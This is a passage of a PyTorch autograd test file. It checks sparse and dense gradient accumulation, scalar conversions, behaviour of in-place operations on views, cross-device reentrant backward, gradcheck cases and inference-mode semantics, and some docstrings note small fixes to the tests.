        # gradgradcheck(fn, (inp,), check_batched_grad=False)

        # assert that _values is non-differentiable
        with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
            other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))

    # Cover empty/non-empty combinations of indices, values and nnz.
    for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
        sparse_size = [] if empty_i else [2, 1]
        dense_size = [1, 0, 2] if empty_v else [1, 2]
        nnz = 0 if empty_nnz else 5
        _test(sparse_size + dense_size, len(sparse_size), nnz, device)
@skipMeta
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
    """Mixed sparse and dense incoming gradients must accumulate into the
    same .grad correctly regardless of arrival order."""
    class FixedGradientFunction(Function):
        # Identity forward; backward returns the gradient fixed at forward time.
        @staticmethod
        def forward(ctx, x, grad_x):
            ctx.save_for_backward(grad_x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            saved_grad_x, = ctx.saved_tensors
            return saved_grad_x, None

    size = torch.Size([6, 3, 2])
    i1 = torch.tensor([
        [0, 3, 4],
        [0, 2, 2],
    ], dtype=torch.long)
    v1 = make_tensor([3, 2], dtype=dtype, device=device)
    sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
    i2 = torch.tensor([
        [0, 1, 3, 4],
        [0, 1, 2, 2],
    ], dtype=torch.long)
    v2 = make_tensor([4, 2], dtype=dtype, device=device)
    sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
    dense_grad = torch.rand(size, device=device, dtype=dtype)
    fn = FixedGradientFunction

    # sparse first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # dense first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # sparse only
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)

# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
    """The gradient of sparse_mask(...).to_dense().sum() w.r.t. the source
    is the mask itself, densified."""
    src = torch.randn(3, requires_grad=True, device=device)
    dense_mask = torch.ones(3, device=device)
    dense_mask[1] = 0
    sparse_mask = dense_mask.to_sparse()
    out = src.sparse_mask(sparse_mask).to_dense()
    out.sum().backward()
    self.assertEqual(src.grad, sparse_mask.to_dense())
def test_pyscalar_conversions(self, device):
    """Conversions between 1-element tensors and Python scalars: int <->
    float round trips, nan/inf handling, OverflowError/ValueError on
    impossible integral conversions, and truthiness."""
    def _test_pyscalar_conversions(t, integral_conv):
        # integral -> integral
        l = t(torch.zeros(1, 1, 1, dtype=torch.long))
        pyscalar = -12345
        l[0] = pyscalar
        self.assertEqual(integral_conv(l), pyscalar)

        # floating point -> floating point
        f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
        pyscalar = -12345.1
        f[0] = pyscalar
        self.assertEqual(float(f), pyscalar)
        f[0] = nan
        self.assertTrue(math.isnan(float(f)))
        f[0] = inf
        self.assertEqual(float(f), inf)
        f[0] = -inf
        self.assertEqual(float(f), -inf)

        # integral -> floating point
        # check we can convert something that loses precision
        pyscalar = 1234567890123456789
        self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
        l[0] = pyscalar
        self.assertEqual(float(l), float(pyscalar))

        # floating point -> integral
        f[0] = nan
        self.assertRaises(ValueError, lambda: integral_conv(f[0]))
        f[0] = inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = -inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = sys.float_info.max
        self.assertEqual(integral_conv(f), sys.float_info.max)

        # bool, nonzero
        def test_nonzero(tensor, value, expected):
            tensor[0] = value
            self.assertEqual(expected, bool(tensor))
            self.assertEqual(expected, True if tensor else False)

        test_nonzero(l, 0, False)
        test_nonzero(l, -2, True)
        test_nonzero(f, 0.0, False)
        test_nonzero(f, sys.float_info.min, True)
        test_nonzero(f, nan, bool(nan))
        test_nonzero(f, inf, bool(inf))
        test_nonzero(f, -inf, bool(-inf))

    _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
    """Enabling requires_grad must raise for non-floating dtypes; disabling
    it is always allowed."""
    def f1():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad_()

    def f2():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad = True

    def f3():
        torch.ones(1, dtype=dtype, device=device, requires_grad=True)

    a = torch.ones(1, dtype=dtype, device=device)
    a.requires_grad = False  # should always work
    a.requires_grad_(False)

    for f in [f1, f2, f3]:
        if dtype.is_floating_point:
            f()
        else:
            with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
                f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
    """Backward of advanced indexing on a large tensor yields all-ones grad."""
    # See https://github.com/pytorch/pytorch/issues/22843
    rows = (1 << 16)
    src = torch.rand(rows, 1, device=device, requires_grad=True)
    picked = src[:, [0]]
    picked.sum().backward()
    self.assertEqual(src.grad, torch.ones(rows, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
    """Backward through advanced indexing when the index tensor is in
    channels_last memory format must not error."""
    # See https://github.com/pytorch/pytorch/issues/36956
    shape = (2, 8, 1, 2)
    # randint(1, ...) makes an all-zero index tensor; only its layout matters here
    i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
    x = torch.randn(shape, requires_grad=True, device=device)
    x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
    """Helper: an error in the parent CPU graph must stop the longer child
    (reentrant) graph and leave no gradients accumulated."""
    t1 = torch.rand([3, 3], requires_grad=True)
    t2 = torch.rand([3, 3], device=device, requires_grad=True)
    t3 = torch.rand([3, 3], device=device, requires_grad=True)

    # Parent graph cpu graph.
    t4 = t1 * t1
    t5 = TestAutograd.SimulateBackwardError.apply(t4)

    # Child gpu graph (much longer than parent graph).
    prev = t2 * t2
    for i in range(10):
        prev = prev * t2
    reentrant_root = prev

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will take much longer.
            reentrant_root.backward()
            return grad

    # Parent gpu graph.
    t6 = ReentrantFunc.apply(t3)
    t7 = t6 * t6

    # Parent graph will error out first, while child graph will continue executing.
    with self.assertRaisesRegex(Exception, "Simulate error"):
        torch.autograd.backward([t5.sum(), t7.sum()])

    # No grads should be accumulated since child graph will stop execution
    # after parent receives error.
    self.assertIsNone(t2.grad)
    self.assertIsNone(t1.grad)
    self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
    """A failed reentrant backward must not leak CUDA memory."""
    before = CudaMemoryLeakCheck.get_cuda_memory_usage()

    # Run as separate function so that gc can clean up everything when we
    # check for memory usage.
    self._test_reentrant_parent_error_on_cpu(device)

    # Wait for autograd thread to cleanup failed tasks.
    after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    start = time.time()
    # poll for up to 30s since cleanup happens asynchronously on the autograd thread
    while before != after and time.time() - start < 30:
        time.sleep(0.1)
        after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    self.assertEqual(before, after)
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
    """gradcheck/gradgradcheck torch.where, including broadcasting operands."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where(cond, x, y):
        return torch.where(cond, x, y)

    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])

    # broadcasting case
    x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
    """gradcheck torch.where with a Python scalar in either branch."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    scalar = 4.
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where_scalar_first(cond, x):
        return torch.where(cond, scalar, x)

    def where_scalar_second(cond, x):
        return torch.where(cond, x, scalar)

    gradcheck(where_scalar_first, (cond, x))
    gradgradcheck(where_scalar_first, (cond, x))
    gradcheck(where_scalar_second, (cond, x))
    gradgradcheck(where_scalar_second, (cond, x))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
    """Intermediates that are not needed for backward must be freed eagerly
    so CUDA memory usage stays flat."""
    x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
    m = torch.randn(1, 3, 1, 1, device=device)

    z = x.sum()
    base_mem = torch.cuda.memory_allocated()
    z = ((x + 2) * m).sum()
    end_mem = torch.cuda.memory_allocated()

    # In the end the memory usage should remain equal, because neither of
    # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
    # previous allocation of z had the same size as the current one.
    self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
    """pin_memory() returns an equal-but-distinct tensor and is differentiable."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    self.assertEqual(x, x.pin_memory())
    self.assertIsNot(x, x.pin_memory())
    self.assertTrue(x.pin_memory().requires_grad)
    gradcheck(lambda x: x.pin_memory(), [x])
    gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
    """Smoke test: emit_nvtx must not break on construction."""
    # This test is not intended to ensure correctness of nvtx ranges.
    # That would require something a great deal more complex (you'd have to create a
    # profile in a subprocess, open it, and parse the sql somehow).
    # This test is merely intended to catch if emit_nvtx breaks on construction.
    a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
    with torch.cuda.profiler.profile():
        with emit_nvtx():
            a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
    """LSTM backward must reach the input even when all weights are frozen."""
    # this checks whether it is possible to not require
    # weight parameters, but require inputs, see #7722
    l = torch.nn.LSTM(2, 3).to(device)
    for p in l.parameters():
        p.requires_grad = False
    s = torch.randn(1, 1, 2, requires_grad=True, device=device)
    out, _ = l(s)
    out.sum().backward()
    self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
    """Assigning .grad validates type, shape, dtype, identity and device."""
    x = torch.randn(5, 5, device=devices[0])

    # Tests that the wrong type raises
    with self.assertRaisesRegex(TypeError, "expected to be a Tensor or None"):
        x.grad = 0

    # Tests that the wrong shape raises
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(2, 2, device=devices[0])

    # Tests that the wrong dtype raises
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])

    # Tests that self-assignment raises
    with self.assertRaises(RuntimeError):
        x.grad = x

    # Tests device -> cpu grad assignment raises
    if self.device_type != 'cpu':
        with self.assertRaises(RuntimeError):
            t_cpu = torch.rand(5, 5)
            t_cpu.grad = torch.randn(5, 5, device=devices[0])

    # Tests half type on CUDA
    if self.device_type == 'cuda':
        x = x.to(dtype=torch.half, device=devices[0])
        x.grad = torch.zeros_like(x)

    # Tests cross-device assignment raises
    if len(devices) > 1:
        x = torch.randn(5, 5, device=devices[0])
        with self.assertRaises(RuntimeError):
            x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
def test_requires_grad_factory(self, devices, dtype):
    """*_like factory functions must honor requires_grad, dtype and device.

    Fix: the device assertion previously inspected the *input* tensor ``x``
    instead of the factory ``output`` it claims to test.  Since both are
    created on devices[0] the test behavior is preserved, but the assertion
    now actually checks the factory result.
    """
    fns = [torch.ones_like, torch.randn_like]
    x = torch.randn(2, 3, dtype=dtype, device=devices[0])

    for fn in fns:
        for requires_grad in [True, False]:
            output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
            self.assertEqual(requires_grad, output.requires_grad)
            self.assertIs(dtype, output.dtype)
            self.assertEqual(devices[0], str(output.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
    """Backward works when only one output of Broadcast is used; the grad
    on the root is doubled by the `* 2`."""
    from torch.nn.parallel._functions import Broadcast
    x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
    outputs = Broadcast.apply(list(range(len(devices))), x)
    y = outputs[-1] * 2
    y.sum().backward()
    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
    self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
    """The gradient delivered to backward() lives on the variable's device."""
    # check that current device matches the variable's device
    device = [None]

    class Identity(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.clone()

        @staticmethod
        def backward(ctx, grad_output):
            # record the device the incoming gradient arrived on
            device[0] = grad_output.device
            return grad_output.clone()

    v = torch.randn(1, device=devices[1], requires_grad=True)
    Identity.apply(v).backward()
    self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
    """Accumulating two cross-device copies of the same leaf into one
    input buffer must not error.

    Fix: renamed the local from ``input`` to ``inp`` — the original name
    shadowed the ``input`` builtin.
    """
    inp = torch.randn(1, device=devices[0], requires_grad=True)
    output = inp.to(device=devices[1]) + inp.to(device=devices[1])
    output.backward()
@onlyCPU
def test_copy_(self, device):
    """copy_ and .to() into every floating dtype (incl. bfloat16) must
    propagate requires_grad."""
    # At the time of writing this test, copy_ is not generated from native_functions.yaml
    # there was a bug that bfloat16 was not recognized as floating.
    x = torch.randn(10, device=device, requires_grad=True)
    floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
    for dt in floating_dt:
        y = torch.empty(10, device=device, dtype=dt)
        y.copy_(x)
        self.assertTrue(y.requires_grad)
        z = x.to(torch.bfloat16)
        self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
    """Reentrant backward across the CPU and GPU autograd worker threads
    in every start/finish combination."""
    class ReentrantFunc(Function):
        # class-level switch: which device the reentrant backward targets
        _cpu_mode = True

        @staticmethod
        def forward(ctx, x):
            return x * (x + 2)

        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                if ReentrantFunc._cpu_mode:
                    new_param = torch.randn(2, 2, requires_grad=True)
                    (new_param ** 2).sum().backward()
                else:
                    new_param = torch.randn(2, 2, device=device, requires_grad=True)
                    (new_param ** 2).sum().backward()
            return grad_output

    # Reentrant starts on GPU thread, finishs on GPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on CPU thread, finishs on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    # set ReentrantFunc node to GPU to emit tasks to GPU queue
    ReentrantFunc._cpu_mode = False
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on GPU thread, finishs on CPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    # set ReentrantFunc node to CPU to emit tasks to CPU queue
    ReentrantFunc._cpu_mode = True
    out = ReentrantFunc.apply(x)
    out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
    """Regression test: an empty NodeTask sent from the CPU worker to the
    GPU worker's ReadyQueue must be handled without segfaulting."""
    # Output on gpu so that this task will be associated with the gpu thread
    def fn_on_gpu(inp):
        # Artificially increase the priority of the next op to make sure it runs
        # as soon as we reach it before the ops of branch1.
        dummy = inp * 2 * 2 * 2 * 2
        return inp.to(device=device)

    def parent_on_cpu(inp):
        # Slow branch of ops on gpu so that the work queue for the gpu thread
        # won't empty too quickly. They also have smaller priorities than the
        # ones created by fn_on_gpu
        branch1 = inp.to(device=device)
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        # Perform checkpoint on cpu tensors. So the last op performed in the reentrant
        # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
        # So the cpu thread will notify the gpu thread with an empty NodeTask.
        branch2 = checkpoint(fn_on_gpu, inp)
        out = branch2 + branch1
        return out

    inp = torch.rand(2, requires_grad=True)
    out = parent_on_cpu(inp)
    # This will segfault if the empty NodeTask is not handled properly in the
    # gpu thread ReadyQueue
    out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
    """In-place multiply on a narrow()ed view; the gradient through the
    base reflects the doubled first row."""
    base = torch.randn(2, 2, device=device, requires_grad=True)
    clone = base.clone()
    first_row = clone.narrow(0, 0, 1)
    first_row.mul_(2)
    clone.sum().backward()
    self.assertEqual(base.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
    """Modify one view in place, then backprop through a second view of the
    same region; the in-place scale must be reflected."""
    # modify view and backprop through view-of-view
    root = torch.randn(2, 2, device=device, requires_grad=True)
    x = root.clone()
    v1 = x.narrow(0, 0, 1)
    v2 = x.narrow(0, 0, 1)
    v1.mul_(2)
    v2.sum().backward()
    self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
    """In-place op on a view-of-a-view; gradient flows through the base."""
    # modify view-of-view and backprop through base
    root = torch.randn(2, 2, device=device, requires_grad=True)
    x = root.clone()
    v1 = x.narrow(0, 0, 1)
    v2 = v1.narrow(1, 1, 1)
    v2.mul_(2)
    x.sum().backward()
    self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
    """Accessing grad_fn of a modified view under no_grad must not corrupt
    the graph for a later backward."""
    # Perform an in-place operation on a view of a non-leaf variable.
    a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
    b = a * 2
    c = b.view_as(b)
    c[0][0] = 3

    # Force a graph update with grad disabled.
    with torch.no_grad():
        c.grad_fn

    c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
    """gradcheck/gradgradcheck a function that mutates nested narrow views."""
    # gradcheck modifications to views
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)

    def func(root, b):
        x = root.clone()
        x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
        x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
    """In-place modification of one output of unbind() must raise."""
    base = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
    views = base.clone().unbind()
    with self.assertRaises(RuntimeError):
        views[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
    """In-place op on a view of a multiple-output view (unbind) must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    b = a.unbind(0)
    c = b[0].view_as(b[0])
    with self.assertRaises(RuntimeError):
        c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
    """In-place op on a multiple-output view (unbind) taken of a view must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    b = a.view_as(a)
    c = b.unbind(0)
    with self.assertRaises(RuntimeError):
        c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
    """An in-place op with a grad-requiring operand flips the base's
    requires_grad from False to True."""
    # in-place modification to view makes base require grad
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
    b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)

    def func(root, b):
        x = root.clone()
        self.assertFalse(x.requires_grad)
        x.narrow(1, 2, 2).mul_(b)
        self.assertTrue(x.requires_grad)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
    """Backprop through an in-place view op reaches only the multiplier, not
    the (requires_grad=False) base."""
    # modify view and backprop through view
    a = torch.tensor([2., 5.], device=device, requires_grad=False)
    b = torch.tensor([3.], device=device, requires_grad=True)
    res = a.narrow(0, 1, 1).mul_(b)
    res.sum().backward()
    self.assertEqual(b.grad.tolist(), [5])
    self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
    """An in-place op on the base also makes pre-existing views require grad
    and backprop correctly."""
    # Test that an in-place operation on a base that forced it to require
    # grad also forces any previous views to require grad and backprop
    # correctly
    r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)

    def fn(r):
        x = torch.ones(5, dtype=torch.double, device=device)
        v = x.select(0, 1)
        self.assertFalse(v.requires_grad)
        self.assertIsNone(v.grad_fn)
        x.add_(r)  # v is now dependent on r due to the in-place op on x
        self.assertTrue(v.requires_grad)
        return v

    gradcheck(fn, [r])
    gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
    """gradcheck in-place modification of views through a custom Python
    autograd Function that marks its input dirty."""
    # in-place modifications of Python-autograd created view
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)

    class PyAdd(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, y):
            ctx.mark_dirty(x)
            x.add_(y)
            return x

        @staticmethod
        def backward(ctx, grad):
            return grad, grad

    def func(root, b):
        x = root.clone()
        PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
        PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
    """In-place op on a view of a non-contiguous (select + transpose) root."""
    root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
    x = root.clone()
    v1 = x.narrow(0, 0, 1)
    v2 = v1.narrow(1, 1, 1)
    v2.mul_(2)
    x.sum().backward()
    self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
    """unsafe_split/unsafe_split_with_sizes/unsafe_chunk outputs may be
    modified in place without raising."""
    for f in [lambda t: t.unsafe_split(1),
              lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
              lambda t: t.unsafe_chunk(3)]:
        a = torch.randn(3, 3, device=device, requires_grad=True)
        b = a + a
        s1, s2, s3 = f(b)
        s1.mul_(s2)
        s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
    """split/split_with_sizes/chunk outputs reject in-place modification."""
    for f in [lambda t: t.split(1),
              lambda t: t.split_with_sizes((1, 1, 1)),
              lambda t: t.chunk(3)]:
        a = torch.randn(3, 3, device=device, requires_grad=True)
        b = a + a
        s1, s2, s3 = f(b)
        error_msg = 'This view is the output of a function that returns multiple views.'
        with self.assertRaisesRegex(RuntimeError, error_msg):
            s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
    """gradcheck mat @ vec where vec is expanded to stride 0 inside fn.

    Fix: ``gradcheck(fn, (vec))`` passed a bare tensor — ``(vec)`` is just
    ``vec`` with redundant parentheses, not a tuple.  gradcheck happens to
    accept a lone tensor, but the intent was a one-element inputs tuple, so
    use ``(vec,)``.
    """
    # Reference: https://github.com/pytorch/pytorch/issues/38315
    mat = torch.randn(2, 2, dtype=torch.double, device=device)
    vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)

    def fn(vec):
        # Expand inside the function to make sure the input to
        # gradcheck does not have overlapping memory
        vec = vec.expand(2)
        return (mat @ vec).sum()

    gradcheck(fn, (vec,))
    gradgradcheck(fn, (vec,))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
    """gradcheck works when the function moves tensors between cpu and cuda."""
    x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
    gradcheck(lambda x: x.to("cpu"), (x,))

    x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
    gradcheck(lambda x: x.to("cuda"), (x,))
def test_strided_leaf_grad_layout(self, device):
    """Gradients of dense leaves match the leaf's strides; gradients of
    non-dense leaves are rowmajor contiguous."""
    # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
    for fmt_a in (torch.contiguous_format, torch.channels_last):
        for fmt_b in (torch.contiguous_format, torch.channels_last):
            a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
            b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
            a.requires_grad_()
            b.requires_grad_()
            # checks (1) for broadcasted gradients
            a.sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            b.sum().backward()
            self.assertEqual(b.grad.stride(), b.stride())
            # checks (1) for non-broadcasted gradients
            a.grad = None
            b.grad = None
            (a * b).sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            self.assertEqual(b.grad.stride(), b.stride())

    # (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
    c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
    c.requires_grad_()
    d = torch.rand((2, 2), device=device)
    # checks (2) for broadcasted gradients
    c.sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
    # checks (2) for non-broadcasted gradients
    c.grad = None
    (c * d).sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
def test_copy_r_to_c(self, device):
    """Copying a real tensor into a complex one backprops a real all-ones
    gradient, without emitting warnings."""
    out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
    inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
                        requires_grad=True)

    def do_test():
        out_c.copy_(inp_r)
        out_c.sum().backward()
        self.assertEqual(inp_r.grad, torch.ones_like(inp_r))

    self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
    """Ops with no derivative (isin, signbit) must not raise and must
    produce requires_grad=False outputs.

    Fix: the signbit input previously omitted ``device=device``, so in this
    device-generic test it always ran on the CPU regardless of the device
    under test; it now honors the fixture.
    """
    # Just make sure the op doesn't raise an error
    # and resulting tensor has requires_grad=False.
    x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
    out = torch.isin(x, torch.tensor([2, 3], device=device))
    self.assertFalse(out.requires_grad)

    x = torch.randn(3, 3, requires_grad=True, device=device)
    out = torch.signbit(x)
    self.assertFalse(out.requires_grad)
def test_warning_in_backward(self, device):
    """Warnings raised inside backward surface as Python warnings."""
    # Test warning during backward are always propagated as python warnings (gh-50209)
    # NOTE: For device=cuda, warning gets propagated from a worker thread
    a = torch.zeros((), device=device, requires_grad=True)
    b = torch._C._nn._test_warn_in_autograd(a)

    with self.assertWarnsRegex(UserWarning, "Warn from backward"):
        b.backward()
class TestAutogradInferenceMode(TestCase):
    """Tests for torch.inference_mode semantics."""

    def _is_inference_tensor(self, tensor):
        """Return True iff `tensor` is an inference tensor, detected by the
        RuntimeError its _version access raises.

        Fix: dropped the unused ``as e`` binding on the AssertionError
        handler.
        """
        try:
            err_msg = "Inference tensors do not track version counter"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                tensor._version
            return True
        except AssertionError:
            return False
def test_inference_mode_context_manager(self):
    """inference_mode(True/False) nests correctly and restores prior state."""
    self.assertFalse(torch.is_inference_mode_enabled())
    with torch.inference_mode():
        self.assertTrue(torch.is_inference_mode_enabled())
        with torch.inference_mode(False):
            self.assertFalse(torch.is_inference_mode_enabled())
        self.assertTrue(torch.is_inference_mode_enabled())
    self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
    """@torch.inference_mode() as a decorator produces inference outputs."""
    @torch.inference_mode()
    def func(x):
        self.assertTrue(torch.is_inference_mode_enabled())
        return x * x

    for requires_grad in (True, False):
        c = torch.ones(1, 2, 3, requires_grad=requires_grad)
        d = func(c)
        self.assertTrue(torch.is_inference(d))
        self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
    """Tensors constructed inside inference mode are inference tensors,
    independent of their requires_grad flag."""
    with torch.inference_mode():
        # new tensors created through constructors are inference tensors
        c = torch.ones(1, 2, 3)
        self.assertFalse(c.requires_grad)
        self.assertTrue(torch.is_inference(c))

        # requires_grad doesn't change inference tensor behavior in InferenceMode
        tmp = torch.ones(1, 2, 3, requires_grad=True)
        self.assertTrue(tmp.requires_grad)
        self.assertTrue(torch.is_inference(tmp))

        tmp = torch.ones(1, 2, 3).requires_grad_(False)
        self.assertFalse(tmp.requires_grad)
        self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
    """In-place updates inside inference mode still bump version counters of
